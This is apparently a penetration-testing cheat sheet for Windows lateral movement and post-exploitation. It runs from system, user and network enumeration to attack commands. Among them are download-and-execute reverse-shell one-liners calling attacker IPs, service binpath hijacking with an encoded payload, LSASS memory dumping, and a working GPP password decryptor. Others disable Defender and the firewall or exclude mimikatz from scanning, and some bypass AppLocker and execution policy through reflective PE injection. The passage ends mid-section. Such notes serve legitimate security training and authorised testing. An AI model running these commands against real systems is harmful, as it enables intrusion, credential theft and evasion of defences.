# Lateral Movement

## 01. Common commands

### 01.1 OS Enumerations

```powershell
## ------------------| Get Basic details
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
whoami /all

## ------------------| Get environment paths
##[Powershell]
Get-ChildItem Env: | ft Key,Value
dir env:

## ------------------| Get .Net Version (cmd/ps)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

## ------------------| Get system architecture (32 or 64 bit)
##[Powershell]
$env:PROCESSOR_ARCHITECTURE
[Environment]::Is64BitProcess
[Environment]::Is64BitOperatingSystem
##[cmd]
set processor

## ------------------| List installed OS patches and updates
wmic qfe 

## ------------------| List installed software (MSI-registered packages only; slow)
wmic product get name, version, vendor

## ------------------| List all disk
mountvol
wmic logicaldisk get caption,description,providername

## ------------------| List firewall state and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
```

### 01.2 User Enumerations

```bash
## ------------------| Get current username
echo %USERNAME% || whoami
$env:username

## ------------------| List user info
net user <UserName>

## ------------------| Get userprofile (home) directory 
write-host $env:USERPROFILE

## ------------------| List user privilege
whoami /priv
whoami /groups

## ------------------| List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name

## ------------------| List logon requirements
net accounts

## ------------------| List all local groups
net localgroup
Get-LocalGroup | ft Name

## ------------------| Get details about a group
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource   # localized (French) name of the same group

## ------------------| Get Domain Controllers
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName

## ------------------| Get Domain Users
net view /domain
net view /domain:DomainName
```

* Create user

```bash
## ------------------| Local account
## Create local user
net user harith Password@123 /add
## Add to the admin group
net localgroup administrators harith /add
## Add to the Remote Desktop Users
net localgroup "Remote Desktop Users" harith /add

## ------------------| Domain account
## /domain runs the command against the domain controller; it works from any domain-joined host if the account has the rights
net user h4rithd Passw0rD$ /add /domain

# List members of a domain group
net group "Exchange Windows Permissions" /domain

# Add a member to a domain group (the user name comes before /add)
net group "Exchange Windows Permissions" h4rithd /add /domain
```

* Login as another user

```bash
## ------------------| From an interactive (RDP/console) session; runas prompts for the password
runas /user:h4rithd cmd.exe
powershell.exe -c "Start-Process cmd.exe -Credential (Get-Credential h4rithd)"

## ------------------| Create Creds Object 
$user = "USERNAME" # Better: $user = "<hostname>\<username>" or "<domain>\<username>"
$pass = "PASSWORD"
$secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential($user,$secStringPass)

## ------------------| Use the Creds Object for activities 
Start-Process -Credential $Creds -FilePath Powershell -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.22/rev.ps1')"
### The two commands below need WinRM listening on the target (TCP 5985/5986) and the account to be a local admin
### or a member of "Remote Management Users". If they fail, check reachability first: Test-WSMan <IP or Hostname>
Invoke-Command -Credential $Creds -ComputerName <IP or Hostname> -ScriptBlock { whoami }
Enter-PSSession -Credential $Creds -ComputerName <IP or Hostname>

## Double hop (a second hop out of the remote session needs delegated creds): CredSSP, enabled on both ends with Enable-WSManCredSSP
Invoke-Command -ComputerName helpline -Authentication CredSSP -Credential $Creds -ScriptBlock { whoami }
```
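Added example (not from the original page): the credential-object workflow above wrapped in a function that separates "WinRM is not reachable" from "wrong credentials", plus the double-hop case solved without CredSSP by handing the credential into the remote session and authenticating explicitly on the far side. `HOST01`, `DOMAIN\h4rithd`, the password and `\\FILESRV\share` are placeholders.

```powershell
# Added example, not from the original page. Assumes WinRM is enabled on $Target
# and that the account is allowed to connect; all host and share names are placeholders.
function Invoke-RemoteAs {
    param(
        [Parameter(Mandatory)] [string] $Target,
        [Parameter(Mandatory)] [string] $User,        # HOST\user or DOMAIN\user
        [Parameter(Mandatory)] [string] $Password,
        [Parameter(Mandatory)] [scriptblock] $ScriptBlock,
        [switch] $UseCredSsp                           # only if Enable-WSManCredSSP was run on both ends
    )
    $sec  = ConvertTo-SecureString $Password -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential($User, $sec)

    # Test-WSMan needs no credential, so a failure here means "not listening / blocked",
    # not "bad password"; that distinction saves a lot of guessing.
    try { $null = Test-WSMan -ComputerName $Target -ErrorAction Stop }
    catch { throw "WinRM not reachable on ${Target} (TCP 5985/5986): $($_.Exception.Message)" }

    $p = @{ ComputerName = $Target; Credential = $cred; ScriptBlock = $ScriptBlock; ErrorAction = 'Stop' }
    if ($UseCredSsp) { $p.Authentication = 'Credssp' }
    Invoke-Command @p
}

# First hop: who are we on the target?
Invoke-RemoteAs -Target 'HOST01' -User 'HOST01\h4rithd' -Password 'Password@123' -ScriptBlock { whoami }

# Second hop without CredSSP: the remote session holds no reusable secret, so a plain
# `dir \\FILESRV\share` inside it fails with access denied. Pass the credential object
# across with $using: and authenticate to the next host explicitly.
$sec  = ConvertTo-SecureString 'Password@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAIN\h4rithd', $sec)
Invoke-Command -ComputerName 'HOST01' -Credential $cred -ScriptBlock {
    $c = $using:cred
    New-PSDrive -Name X -PSProvider FileSystem -Root '\\FILESRV\share' -Credential $c | Out-Null
    Get-ChildItem X:\
}
```

The `$using:` variant is the lighter option when you only need one extra hop to a file share or a second host; CredSSP stays the answer when the remote session must keep acting as the user for many hops, at the cost of leaving clear-text credentials on the intermediate host.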

* Change password

```bash
## PowerView must be loaded first (Set-DomainUserPassword); needs reset-password rights on the target account
$pass = ConvertTo-SecureString 'Pas$word!' -asPlainText -Force
Set-DomainUserPassword Herman -AccountPassword $pass -Verbose
```

* Stored Credentials | Saved Creds

```bash
cmdkey /list
runas /savecred /user:<USERNAME> C:\<PATH>\shell.exe
```

### 01.3 Network Enumeration

```bash
## ------------------| List all listening ports
netstat -ano | findstr /i listen
netstat -anop tcp

## ------------------| List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

## ------------------| List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

## ------------------| List the ARP table
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

## ------------------| List all network shares (Find-DomainShare is PowerView)
net share
powershell Find-DomainShare -ComputerDomain domain.local

## ------------------| SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```

* Turn on RDP

```bash
## ------------------|  Enable the RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

## ------------------|  Require Network Level Authentication for RDP (set 0 to also allow clients without NLA)
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1    

## ------------------|  Enable RDP through the Windows Firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 

## ------------------|  Using MSF
use post/windows/manage/enable_rdp
set Username h4rithd
set Password Password123!
set SESSION 1
info
run

## ------------------| Login to the RDP
rdesktop -g 1920x1080 <IP>
```

* Ping sweeper

```bash
## ------------------| General
1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_} | Select-String ttl

## ------------------| Parallel ping sweeper (workflows exist only in Windows PowerShell 5.1 and earlier)
workflow ParallelSweep { foreach -parallel -throttlelimit 4 ($i in 1..255) {ping -n 1 -w 100 10.0.0.$i}}; ParallelSweep | Select-String ttl

## ------------------| Multi-subnet ping sweeper with TTL-based OS guess (TTL is read with a regex, so "time=5ms" and "time<1ms" replies both parse)
0..10 | % { $a = $_; 1..255 | % { $b = $_; ping -n 1 -w 10 "10.0.$a.$b" | select-string 'TTL=(\d+)' | % { $ttl = [int]$_.Matches[0].Groups[1].Value; if ($ttl -lt 65) { $os = "Linux" } ElseIf ($ttl -lt 129) { $os = "Windows" } else { $os = "Cisco/network device" }; write-host "10.0.$a.$b OS: $os"; echo "10.0.$a.$b" >> scan_results.txt }}}
```

* Export DNS Zones

```bash
Get-DNSServerZone
Export-DnsServerZone -Name localnet.domain -FileName dns-export.txt
## File was exported to C:\Windows\system32\dns\dns-export.txt
```

* Responder \[[Inveigh](https://github.com/Kevin-Robertson/Inveigh)]

```bash
wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/Inveigh.ps1')
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y  
```

### 01.4 Process / Service Enumeration

```bash
## ------------------| List processes (filtered by name)
Get-Process -name firefox
tasklist /v | findstr smss
ps | findstr smss

## ------------------| List all services
Get-Service
sc query state= all
get-wmiobject win32_service
## If the commands above fail, read the service keys straight from the registry
Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'
Get-ChildItem . | select name
Get-ChildItem . | where-object { $_.Name -like '*EnterServiceNameHere*' }

## ------------------| Processes running as "system"
tasklist /v /fi "username eq system"

## ------------------| Kill process
taskkill /f /im filename.exe

## ------------------| Scheduled Tasks
### List all tasks
schtasks /query /fo LIST /v
### Run task
schtasks /run /tn "\NameHere"

## ------------------| Start Service (Stop,Restart)
## Get the display name using the method above
Stop-Service "Ubiquiti UniFi Video"
Start-Service "Ubiquiti UniFi Video"
net stop EnterServiceNameHere
net start EnterServiceNameHere
sc.exe stop EnterServiceNameHere
sc.exe start EnterServiceNameHere

## ------------------| Examine basic service properties
Get-Service nscp | fl *

## ------------------| List loaded assemblies
[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname

## ------------------| List only running services
Get-Service | where {$_.Status -eq "Running"} 

## ------------------| Unquoted service paths: auto-start services outside C:\Windows whose path contains no quotes
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
```

* Modifiable Services

```bash
## ------------------| Modify the UsoSvc service bin path
sc.exe config UsoSvc binpath="cmd.exe /c powershell -EncodedCommand SQBFAFgAKABOA.....ApAA=="    

## ------------------| Restart the UsoSvc service 
sc.exe stop UsoSvc 
sc.exe start UsoSvc 
```

* Dump process

```bash
## ------------------| Dump a process with the MiniDump export of comsvcs.dll (lsass needs an elevated shell / SeDebugPrivilege)
get-process 
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> <PATH-TO-SAVE-FILE> full
## Dumping lsass without mimikatz
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\Documents\lsass.dmp

## ------------------| Dump Process using ProcDump 
./procdump.exe -accepteula -ma <PID>
```

* List installed programs

```bash
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```

### 01.5 File Enumeration

```bash
## ------------------| List all files including hidden ones / find a file by name
dir -force                                   # PowerShell: alias of Get-ChildItem -Force
dir /b /s C:\flag.txt                        # cmd: recursive search starting at C:\
where /R C:\ flag.txt
gci -r . user.txt
gci -recurse | select FullName
gci -recurse C:\Users\ user.txt
Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname

## ------------------| Get file stream data
cmd /c dir /r
Get-Item <FileName> -Stream *
Get-Content <FileName> -Stream <StreamName>

## ------------------| List only files that have an extension
gci -recurse -include *.* | select FullName

## ------------------| List all installed drivers / version
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
```

* Advance search

```bash
## ------------------| Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

## ------------------| Search for a file with a certain filename
dir /S /B *pass*.txt *pass*.xml *pass*.ini *cred* *vnc* *.config*
where /R C:\ user.txt
where /R C:\ *.ini

## ------------------| Search for strings inside files
IWR -Uri "https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1" -OutFile "Find-Strings.ps1"
.\Find-Strings.ps1 -stopAt "5"
.\Find-strings.ps1 -Path "$Env:TMP" -String "pass=|passwd=|password="
.\Find-strings.ps1 -Path "$Env:USERPROFILE" -String "[^$]password="

## ------------------| Find GPP Passwords in SYSVOL
dir "C:\ProgramData\Microsoft\Group Policy\History\"
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

## ------------------| Search Windows Autologin
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword /reg:64
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | findstr "DefaultUserName DefaultDomainName DefaultPassword"
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 

## ------------------| Search the registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

## ------------------| Search SNMP parameters (community strings)
REG QUERY "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s

## ------------------| Search Putty clear text proxy credentials
REG QUERY "HKCU\Software\SimonTatham\PuTTY\Sessions"

## ------------------| Search VNC credentials
REG QUERY "HKCU\Software\ORL\WinVNC3\Password"
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

## ------------------| Same search over key names, value names and data (above, /K limits it to key names)
REG QUERY HKLM /f password /t REG_SZ /s
REG QUERY HKCU /f password /t REG_SZ /s

## ------------------| Search Insecure File Permissions (world writable)
### Tool : https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
accesschk.exe /accepteula -uwcqv "Authenticated Users" *        # -c: services the group can write to (reconfigure)
accesschk.exe /accepteula -uws "Everyone" "C:\Program Files"    # -s: recurse files/dirs, -w: write access only

## ------------------| Backup Sticky Notes
### Win 10 (1607 and later): plum.sqlite plus its -wal/-shm files; copy all plum.* and open with sqlite3
cd C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
### Win 7/8 and Win 10 up to 1511: StickyNotes.snt (OLE compound file; `strings` usually recovers the note text)
cd C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Sticky Notes
```
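Added example, not from the original page: the `findstr cpassword` lines above only locate Group Policy Preferences passwords; this turns each hit into the clear-text value using the static AES-256 key Microsoft published for GPP (MS-GPPREF, "Password Encryption"), and walks SYSVOL for the preference files that can carry one. It assumes a domain-joined host (`$env:USERDNSDOMAIN` set) with read access to SYSVOL; the user attribute reported is the first account-like attribute in the file, which is enough for a first pass.

```powershell
# Added example, not from the original page. Assumes SYSVOL is readable from this host.
function ConvertFrom-GPPPassword {
    param([Parameter(Mandatory)] [string] $Cpassword)

    # GPP strips the base64 '=' padding; restore it before decoding
    $b64 = $Cpassword.Trim()
    $b64 += '=' * ((4 - ($b64.Length % 4)) % 4)
    $cipher = [Convert]::FromBase64String($b64)

    # Static AES-256 key published by Microsoft, CBC mode, all-zero IV, PKCS7 padding
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                        0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    $aes.IV      = New-Object byte[] 16
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7

    $dec   = $aes.CreateDecryptor()
    $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
    $aes.Dispose()
    [System.Text.Encoding]::Unicode.GetString($plain)    # GPP stores the password as UTF-16LE
}

function Find-GPPPassword {
    param([string] $SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL")

    # Preference files that may embed a cpassword attribute
    $names = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Printers.xml','Drives.xml'
    Get-ChildItem -Path $SysvolPath -Recurse -Include $names -ErrorAction SilentlyContinue | ForEach-Object {
        $xml = Get-Content -LiteralPath $_.FullName -Raw
        foreach ($m in [regex]::Matches($xml, 'cpassword="([^"]+)"')) {
            # First account-like attribute in the file (assumption: one principal per file)
            $user = if ($xml -match '(userName|runAs|accountName)="([^"]*)"') { $Matches[2] } else { '(unknown)' }
            [pscustomobject]@{
                File     = $_.FullName
                User     = $user
                Password = ConvertFrom-GPPPassword $m.Groups[1].Value
            }
        }
    }
}

Find-GPPPassword | Format-Table -AutoSize
```

Any hit is a finding in itself even if the account was since disabled: the same file has been readable by every domain user since the policy was created, so treat the password as already known to anyone who has had a foothold in the domain.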

* Weak Permission

```powershell
## ------------------| File\Folder (cmd syntax; 2>nul drops the "access denied" noise)
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"

## ------------------| Service (unquoted paths first, then service binaries writable by BUILTIN\Users)
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "BUILTIN\Users:(I)(F)"
icacls "C:\Program Files\*" 2>nul | findstr "BUILTIN\Users:(I)(F)"
```
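Added example, not from the original page: the `wmic`/`icacls` one-liners in the Modifiable Services and Weak Permission sections above grep for three things by eye (unquoted path with spaces, binary writable by us, binary's folder writable by us). This function does the same check against the current token's actual SIDs and returns objects instead of text. It needs PowerShell 3+ for `Get-CimInstance`; deny ACEs are deliberately not evaluated, so confirm a hit with `icacls` or `accesschk` before acting on it.

```powershell
# Added example, not from the original page. Read-only audit; nothing is modified.
function Get-WeakService {
    [CmdletBinding()]
    param([switch] $IncludeWindowsDir)   # services under C:\Windows are skipped by default, as in the findstr version

    $me        = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids    = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    $writeMask = [int][System.Security.AccessControl.FileSystemRights] 'Write, Modify, FullControl, ChangePermissions, TakeOwnership'

    function Test-WritableByMe([string] $Path) {
        try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }        # deny ACEs ignored: first pass only
            try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }                                           # orphaned / untranslatable SID
            if (($mySids -contains $sid) -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
        }
        return $false
    }

    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName } |
        ForEach-Object {
            $raw    = $_.PathName.Trim()
            $quoted = $raw.StartsWith('"')
            if ($quoted) {
                $end = $raw.IndexOf('"', 1); if ($end -lt 0) { $end = $raw.Length }
                $bin = $raw.Substring(1, $end - 1)
            } elseif ($raw -match '^(.*?\.exe)') { $bin = $Matches[1] }   # unquoted: everything up to the first .exe
            else { $bin = ($raw -split ' ')[0] }

            if (-not $IncludeWindowsDir -and $bin -like "$env:SystemRoot\*") { return }

            [pscustomobject]@{
                Name           = $_.Name
                RunsAs         = $_.StartName
                Binary         = $bin
                UnquotedSpaces = (-not $quoted) -and ($bin -match ' ')   # classic unquoted-service-path case
                BinaryWritable = Test-WritableByMe $bin
                FolderWritable = Test-WritableByMe (Split-Path -Parent $bin)
            }
        } |
        Where-Object { $_.UnquotedSpaces -or $_.BinaryWritable -or $_.FolderWritable }
}

Get-WeakService | Format-Table -AutoSize
```

`RunsAs` is the column that decides whether a hit matters: a writable binary for a service running as `LocalSystem` is a privilege escalation, the same for a service running as a virtual service account is usually not.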

* Set / Check permissions

```bash
## ------------------| Check
Get-ACL folder-or-file-name | FL *
Get-ACL root.txt | FL AccessToString

## ------------------| Set Full-Control
cacls root.txt /t /e /p UserName:F

## ------------------| Remove user from ACL
cacls root.txt /e /r UserName

#---------------- cacls Commands Help
# /e	Edit an ACL instead of replacing it.
# /t	Changes ACLs of specified files in the current directory and all subdirectories.
# /p user:<perm> Replace specified user's access rights, including these valid values for permission:
#  |->   n - None
#  |->   r - Read
#  |->   w - Write
#  |->   c - Change (write)
#  |->   f - Full control

## ------------------| Search Insecure File Permissions (check World Writeble)
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
```

* Enumerate Shortcut (`.lnk`)

```bash
$Wscript = New-Object -ComObject Wscript.Shell
## CreateShortcut() takes a path, so resolve each .lnk and read its target
Get-ChildItem *.lnk -Recurse | ForEach-Object {
    $Wscript.CreateShortcut($_.FullName) | Select-Object FullName, TargetPath, Arguments, WorkingDirectory
}
```

* Compress & Extract zip file

```bash
## ------------------| Compress
Compress-Archive -LiteralPath <PathToFiles> -DestinationPath <PathToDestination>.zip            

## ------------------| Extract / Unzip
Expand-Archive -LiteralPath <PathToZipFile>.zip -DestinationPath <PathToDestination>
```

### 01.6 Firewall / Defender

#### 01.6.1 Firewall

```bash
## ------------------| List firewall state and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all

## ------------------| List firewall rules
Get-NetFirewallPortFilter
Get-NetFirewallRule
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow

## ------------------| Add firewall rule to open 3306 port
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<compromised_ip> localport=3306 action=allow

## ------------------| Enable RDP via the registry (cmd); this key toggles RDP only, it does not touch the firewall
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

## ------------------| Enable RDP via the registry (PowerShell)
powershell.exe -ExecutionPolicy Bypass -command "Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections' -Value 0"

## ------------------| Disable Firewall on any windows via cmd
netsh firewall set opmode disable               # legacy "netsh firewall" context; deprecated on newer builds
netsh advfirewall set allprofiles state off

## ------------------| Allow remote admin (psexec, ADMIN$, C$, IPC$ shares) with local admin accounts other than RID 500
REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

## ------------------| List firewall's blocked rules (Action 0 = block)
powershell -c "$f=New-Object -ComObject HNetCfg.FwPolicy2; $f.Rules | where {$_.Action -eq 0} | select Name,ApplicationName,LocalPorts"
powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}}, @{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}}, @{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}}, Enabled, Profile, Direction, Action"
```

#### 01.6.2 Antivirus & Detections | Disable Defender

```bash
## ------------------| Check Defender Status
Get-MpComputerStatus

## ------------------| Remove signatures (Defender keeps running but has nothing to match on; re-downloaded when online)
cd "C:\Progra~1\Windows Defender"
.\mpcmdrun.exe -RemoveDefinitions -All

## ------------------| Disable real-time monitoring, then scanning of downloaded files and attachments (IOAV)
## All Set-MpPreference/Add-MpPreference changes need local admin and are rejected while Tamper Protection is on
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true

## ------------------| Disable script scanning (Defender's AMSI consumer); $false re-enables it
Set-MpPreference -DisableScriptScanning $true

## ------------------| Exclude a Folder, Extension or Process
Add-MpPreference -ExclusionPath "C:\Windows\Temp" -Force
Add-MpPreference -ExclusionPath "C:\Windows\Tasks" -Force
Add-MpPreference -ExclusionPath "C:\Windows\Temp\h4rithd" -Force
Set-MpPreference -ExclusionProcess "mimikatz.exe", "winPEAS.exe" -Force
Add-MpPreference -ExclusionExtension "exe" -Force

## ------------------| Remove signatures (if Internet connection is present, they will be downloaded again):
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
```

### 01.7 Default Locations

```bash
## ------------------| Powershell Default locations
[x86] C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
[x64] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[x64] C:\windows\sysnative\windowspowershell\v1.0\powershell.exe

## ------------------| Default Writeable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public

## ------------------| Passwords in unattend.xml
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

## ------------------| Sticky Notes passwords
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite   

## ------------------| Powershell History
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
```

* World writable directories (for AnyUsers)

```bash
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\system32\spool\drivers\color
C:\Users\Public
C:\Users\Public\Documents
C:\Windows\tracing
C:\Windows\Tasks
C:\Windows\Temp
```

### 01.8 Policy Bypassing

* PowerShell **Execution Policy** [Bypass](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)

```bash
## ------------------| Check/Set Execution Policy Status
Set-ExecutionPolicy RemoteSigned     # To set the policy to RemoteSigned.
Set-ExecutionPolicy Unrestricted     # To set the policy to Unrestricted.
Get-ExecutionPolicy                  # To verify the current settings for the execution policy.    
Get-ExecutionPolicy -List | Format-Table -AutoSize

## ------------------| How to bypass
## 0) If you have evil-winrm access; copy rev.ps1 file to current directory. then 
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>  -s $(pwd)
rev.ps1
menu

## 1) Copy & Paste the Script into an Interactive PowerShell Console

## 2) Read Script from a File and Pipe to PowerShell Standard In
Get-Content rev.ps1 | PowerShell.exe -noprofile -
type rev.ps1 | PowerShell.exe -noprofile -

## 3) Download Script from URL and Execute with Invoke Expression
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://<IP>/rev.ps1')"

## 4) Use the "Bypass" Execution Policy Flag
PowerShell.exe -ExecutionPolicy Bypass -File .\rev.ps1
```

* Bypass the App Locker Group Policy

```bash
## ------------------| Check App locker status
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

## ------------------| Bypass | Move file to following paths
C:\Windows\Temp 
C:\Windows\Tasks 
C:\windows\tracing
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\Registration\CRMLog
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
C:\Windows\System32\Tasks_Migrated # after performing a version upgrade of Windows 10

## ------------------| Bypass using PowerSploit's Invoke-ReflectivePEInjection (the EXE is loaded into the PowerShell process, so AppLocker never sees a new process)
cp /opt/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 .
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/Invoke-ReflectivePEInjection.ps1')  
$PEBytes = [IO.File]::ReadAllBytes('full\path\for\application.exe')
Invoke-ReflectivePEInjection -PEBytes $PEBytes
## Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

## ------------------| More info
https://github.com/api0cradle/UltimateAppLockerByPassList
```

* PowerShell **Constrained Language Mode** [Bypass](https://github.com/padovah4ck/PSByPassCLM).

```bash
## ------------------| Verify ConstrainedLanguage mode enabled?
$ExecutionContext.SessionState.LanguageMode

